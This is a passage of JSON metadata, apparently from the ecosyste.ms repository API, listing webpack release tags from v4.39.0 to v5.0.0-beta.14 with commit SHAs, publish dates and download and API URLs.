:"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fw